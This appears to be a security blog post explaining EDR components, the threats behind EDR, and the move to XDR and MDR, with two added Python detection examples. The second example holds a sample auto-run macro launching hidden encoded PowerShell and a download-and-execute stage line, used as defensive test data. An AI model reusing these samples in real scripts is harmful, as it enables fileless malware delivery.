By: Elviraluke Napwora
August 2, 2021
LET’S DELVE INTO THE WORLD OF ENDPOINT DETECTION AND RESPONSE (EDR)
The rise of endpoint devices in the corporate environment has increased organizations' security risk, because each device is a potential attack surface. To counter some of these challenges, an organization must implement an endpoint security strategy with the necessary tools, such as EDR.
Endpoint Detection and Response (EDR) solutions provide an integrated view of the security of endpoint nodes through continuous, real-time monitoring of system activity on those endpoints. The data collected from the endpoints provides further insight, security analysis, and automated response in your environment when security incidents occur. The graphical view that EDR provides allows one to map out the various activities an attacker undertook while inside your environment, giving security teams comprehensive visibility of the incidents occurring there and of their characteristics.
EDR's capabilities are broad: advanced threat detection and investigation, automated response, incident alert triage, suspicious activity validation, proactive threat hunting, and more. The collective intelligence behind EDR improves its ability to identify threats (zero-day exploits, multi-layered attacks, advanced persistent threats, fileless malware attacks, etc.) that would evade legacy security solutions such as antivirus. It therefore adds a layer of endpoint protection against otherwise hidden threats.
MAIN COMPONENTS OF EDR SECURITY
The key components of EDR security are centered on the collection, correlation, and analysis of endpoint data. This provides a coordinated approach to reviewing alerts and to the responses undertaken afterward when an incident occurs. The basic components of EDR tools include:
Endpoint data collection agents - Software agents monitor endpoints and collect activity data relating to various indicators of compromise that could signal a threat. The data collected includes device processes, network connections, device activity, and the volume of data transfers. The aggregated, crowdsourced data is then used to guide how best to respond when malicious activity is detected.
Automated response - Identifies threats by applying pre-configured rules to the collected data. Automation is key to ensuring that every incident is thoroughly investigated (identification of and response to security threats) at speed, in minutes rather than hours. The triggered automatic response could entail containing or removing the specific threat, blocking users, notifying the necessary security personnel, and so on.
Forensic analysis - Tools and capabilities to search for suspicious activities, perform user behavior analytics, and research identified threats. Through real-time analytics, the large volume of collected data is evaluated and correlated to identify patterns that strongly indicate a threat. The forensic tools, on the other hand, allow security professionals to hunt for threats and perform post-attack analysis aimed at understanding exploits and investigating past security breaches. From the custom indicators of compromise identified on each endpoint, a proactive defense strategy can be developed against future attacks.
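To make the three components concrete, here is an added example (not code from the original article or from any EDR product) of a minimal pipeline in Python: an agent-style event feed, a rule engine with automated response, and the process-lineage view that forensic analysis relies on. The host names, file paths, addresses, byte counts and the 500 MB egress threshold are all constructed sample values.

```python
"""Toy EDR pipeline: telemetry collection -> rule analysis -> correlation -> response.
Added example with constructed data; not tied to any real product or host."""
from collections import defaultdict
from datetime import datetime, timedelta

# --- 1. Endpoint data collection: normalized events as an agent would forward them ---
# Constructed telemetry for two hypothetical workstations, WS-017 and WS-042.
EVENTS = [
    {"ts": "2021-08-02T09:00:00", "host": "WS-017", "type": "process_start", "pid": 410, "ppid": 300,
     "image": r"C:\Windows\explorer.exe"},
    {"ts": "2021-08-02T09:01:10", "host": "WS-017", "type": "process_start", "pid": 512, "ppid": 410,
     "image": r"C:\Users\jdoe\AppData\Local\Temp\update_helper.exe"},
    {"ts": "2021-08-02T09:01:15", "host": "WS-017", "type": "network_connect", "pid": 512,
     "dst": "203.0.113.7", "dport": 8443, "bytes_out": 250_000_000},
    {"ts": "2021-08-02T09:02:00", "host": "WS-017", "type": "network_connect", "pid": 512,
     "dst": "203.0.113.7", "dport": 8443, "bytes_out": 300_000_000},
    {"ts": "2021-08-02T09:05:00", "host": "WS-042", "type": "process_start", "pid": 880, "ppid": 700,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"ts": "2021-08-02T09:05:03", "host": "WS-042", "type": "network_connect", "pid": 880,
     "dst": "198.51.100.20", "dport": 443, "bytes_out": 4_000},
]

# --- 2. Pre-configured rules (constructed thresholds and lists) ---
USER_WRITABLE_HINTS = ("\\appdata\\local\\temp\\", "\\downloads\\")
EXPECTED_NETWORK_IMAGES = {"firefox.exe", "chrome.exe", "outlook.exe", "svchost.exe"}
EGRESS_THRESHOLD_BYTES = 500_000_000   # per process; constructed for the example
WINDOW = timedelta(minutes=10)          # findings this close together form one incident
CONTAINMENT_SCORE = 5                   # combined severity at which we contain automatically


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(events):
    """Apply the rules; return findings as (ts, host, pid, rule, severity) tuples."""
    findings = []
    image_by_key = {(e["host"], e["pid"]): e["image"]
                    for e in events if e["type"] == "process_start"}
    egress, last_ts, flagged_net = defaultdict(int), {}, set()
    for e in events:
        key = (e["host"], e["pid"])
        if e["type"] == "process_start":
            if any(h in e["image"].lower() for h in USER_WRITABLE_HINTS):
                findings.append((e["ts"], e["host"], e["pid"], "exec_from_user_writable_dir", 2))
        elif e["type"] == "network_connect":
            image = image_by_key.get(key, "<unknown>")
            if basename(image) not in EXPECTED_NETWORK_IMAGES and key not in flagged_net:
                flagged_net.add(key)   # one finding per process, not per connection
                findings.append((e["ts"], e["host"], e["pid"], "unexpected_network_process", 2))
            egress[key] += e["bytes_out"]
            last_ts[key] = e["ts"]
    for key, total in egress.items():   # volume of data transfers, summed per process
        if total > EGRESS_THRESHOLD_BYTES:
            findings.append((last_ts[key], key[0], key[1], "large_egress", 3))
    return findings


def respond(incident):
    """Automated response: always notify the SOC; contain when the combined score is high."""
    actions = ["notify_soc"]
    if incident["score"] >= CONTAINMENT_SCORE:
        pids = sorted({f[2] for f in incident["findings"]})
        actions += [f"kill_process:{pid}" for pid in pids] + ["isolate_host"]
    return actions


def correlate(findings):
    """Group findings per host into incidents; a finding within WINDOW of the incident start joins it."""
    incidents, by_host = [], defaultdict(list)
    for f in sorted(findings):          # ISO timestamps sort chronologically as strings
        by_host[f[1]].append(f)
    for host, fs in by_host.items():
        current = None
        for f in fs:
            t = datetime.fromisoformat(f[0])
            if current and t - current["start"] <= WINDOW:
                current["findings"].append(f)
            else:
                current = {"host": host, "start": t, "findings": [f]}
                incidents.append(current)
    for inc in incidents:
        inc["score"] = sum(f[4] for f in inc["findings"])
        inc["actions"] = respond(inc)
    return incidents


def process_tree(events, host):
    """Forensic view: parent pid -> [(child pid, image)], the data behind an EDR process graph."""
    children = defaultdict(list)
    for e in events:
        if e["type"] == "process_start" and e["host"] == host:
            children[e["ppid"]].append((e["pid"], basename(e["image"])))
    return dict(children)


def lineage(events, host, pid):
    """Forensic view: ancestry of a process, root first (how did this process come to exist?)."""
    procs = {e["pid"]: e for e in events if e["type"] == "process_start" and e["host"] == host}
    chain = []
    while pid in procs:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for inc in correlate(analyze(EVENTS)):
        print(inc["host"], "score", inc["score"], [f[3] for f in inc["findings"]], inc["actions"])
        for f in inc["findings"]:
            print("  pid", f[2], "lineage:", " -> ".join(lineage(EVENTS, inc["host"], f[2])))
```

Run as-is and the WS-017 events produce one incident (execution from a temp directory, an unexpected process talking to the network, and 550 MB of egress) whose score crosses the containment threshold, so the response is kill-plus-isolate rather than alert-only; WS-042's browser traffic produces nothing. The lineage call is the text form of the "graphical view" the article mentions: it shows the flagged process descending from explorer.exe, which is what an analyst would check first during triage.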
KEY THREATS THAT SPARKED THE DEVELOPMENT OF EDR
Endpoint Detection and Response (EDR) solutions were developed to fill the security gaps left by other tools as attackers advanced their techniques for deploying malicious code. Those techniques easily bypass traditional security measures, which rely heavily on recognizing malicious executables to identify malware. Attacks have since moved to techniques that run malicious code without installing malware at all.
The section below looks at key events that sparked the development of EDR and necessitated its use:
1. Document-Based Malware
Traditionally, security awareness training has focused on enlightening users about the threats that can arise when downloading and/or executing unknown applications. Unfortunately, many users are unaware of the high risk posed by document files, which can also run malicious processes. Attacks have therefore moved to delivering malware or malicious scripts through files users are much more likely to open, such as Excel, PDF, Word, or PowerPoint files. One example is document malware hidden in macros; a macro is a set of scripted instructions used to automate business tasks and processes and increase efficiency. The obvious defense would be to block macros completely, but that also removes the efficiency gains macros bring to the business. EDR solutions address this challenge by using both static and dynamic malware analysis capabilities to decide whether a given item, such as a macro, should be flagged as malicious.
2. Fileless Attacks
Fileless malware operates in the computer's memory, executing its own processes or abusing trusted system processes to run code. Because the attack requires no files to be written to disk, it is much harder to detect with standard methods that scan for malware signatures. Here, behavioral analysis provides the solution, and EDR includes behavioral analysis features among its components to meet this challenge.
3. Antivirus Limitations
Legacy antivirus solutions use signature-based methods to identify malware and malicious processes, which means their detection is limited to previously known or identified malware signatures. Unfortunately, this is not sufficient in a world where security threats and exploits grow exponentially.
The rise of Next-Generation Antivirus (NGAV) will address some of the challenges posed by traditional antivirus by incorporating behavior analysis, machine learning, and AI into malware detection. By doing so, NGAVs can examine more artifacts, such as file hashes, URLs, and IP addresses, in addition to performing signature-based detection.
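The three points above (macro-laden documents, fileless execution, and the limits of signature matching) fit into one added Python example, which is not code from the original article or any antivirus or EDR product. It contrasts a hash-only signature check with a static macro check and two behavioral rules on process-start telemetry. The "signature database", the VBA snippet, the command lines, the host name and the example.invalid URL are all constructed; the `-EncodedCommand` decoding mirrors how PowerShell encodes that argument (base64 of UTF-16LE text).

```python
"""Signature matching versus static and behavioral analysis for the document-macro
and fileless cases. Added example; every sample value below is constructed."""
import base64
import hashlib
import re

# Constructed "signature database": SHA-256 hashes of files already known to be malicious.
KNOWN_BAD_SHA256 = {hashlib.sha256(b"CONSTRUCTED-KNOWN-BAD-SAMPLE").hexdigest()}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
# Static macro analysis: an auto-run entry point combined with a process launch primitive.
AUTOEXEC = re.compile(r"\b(AutoOpen|Document_Open|Auto_Open|Workbook_Open)\b", re.I)
LAUNCH = re.compile(r"\b(Shell|ShellExecute|Exec)\b", re.I)
# Behavioral hints that a script host is running a payload that never touches disk.
MEMORY_ONLY_HINTS = ("downloadstring(", "invoke-expression", "iex ", "-windowstyle hidden", "-w hidden")


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def signature_verdict(file_bytes):
    """Legacy antivirus: a file is malicious only if its exact hash is already known."""
    return "malicious" if hashlib.sha256(file_bytes).hexdigest() in KNOWN_BAD_SHA256 else "clean"


def static_macro_verdict(vba_text):
    """Static analysis of macro source: auto-run entry point plus a launch primitive is flagged."""
    return "suspicious" if AUTOEXEC.search(vba_text) and LAUNCH.search(vba_text) else "benign"


def decode_encoded_command(cmdline):
    """Append the decoded -EncodedCommand script (base64 of UTF-16LE) so rules see the real text."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def behavior_verdict(event):
    """Behavioral rules on a process_start event: who launched it and what it was told to run."""
    reasons = []
    parent, child = basename(event["parent_image"]), basename(event["image"])
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append("office_app_spawned_script_host")    # document-based delivery
    script = decode_encoded_command(event["cmdline"]).lower()
    if child in SCRIPT_HOSTS and any(h in script for h in MEMORY_ONLY_HINTS):
        reasons.append("script_host_memory_only_execution")  # fileless stage: nothing written to disk
    return reasons


# --- Constructed samples ---
MACRO_SOURCE = (
    "Sub AutoOpen()\n"
    "  CreateObject(\"WScript.Shell\").Run \"powershell -w hidden -enc <placeholder>\", 0\n"
    "End Sub\n"
)
STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
ENCODED = base64.b64encode(STAGE.encode("utf-16-le")).decode()
EVENTS = [
    {"host": "WS-017", "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "WS-017", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe report.txt"},
]

if __name__ == "__main__":
    print("known sample:", signature_verdict(b"CONSTRUCTED-KNOWN-BAD-SAMPLE"))
    print("known sample, one byte appended:", signature_verdict(b"CONSTRUCTED-KNOWN-BAD-SAMPLE "))
    print("novel macro document, signature:", signature_verdict(MACRO_SOURCE.encode()))
    print("novel macro document, static:", static_macro_verdict(MACRO_SOURCE))
    for e in EVENTS:
        print(basename(e["parent_image"]), "->", basename(e["image"]), behavior_verdict(e))
```

The output makes the article's argument visible: appending a single byte to a known sample defeats the hash lookup, and the macro document is never in the database in the first place, yet the static check flags its auto-run plus launch pattern, and the behavioral rules flag the resulting process chain (Word spawning PowerShell with a download-and-evaluate script) without needing any file to inspect. The notepad event passes both rules, which is the kind of negative case to keep when tuning such rules against false positives.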
FUTURE OF EDR: THE MOVE TO XDR AND MDR
Security solutions are in constant evolution because of the rapid change in how attackers deploy attacks and in the underlying technology. Although EDR has been effective in handling the security challenges so far, broader approaches have evolved from it, namely XDR and MDR.
Extended Detection and Response (XDR) refers to enhanced detection and response capabilities across broader systems and networks, which may include cloud services, on-premises infrastructure, data centers, and Internet of Things (IoT) networks. The unified visibility across these systems and networks provides context for the security events observed, so analysts can identify attacks in your environment early on.
The rise of managed EDR, or managed detection and response (MDR), shows another way in which EDR solutions are evolving. MDR providers deliver Security-as-a-Service to organizations through a 24/7 security operations center (SOC) and the security expertise needed to extend, cost-effectively, the benefits an organization gets from XDR.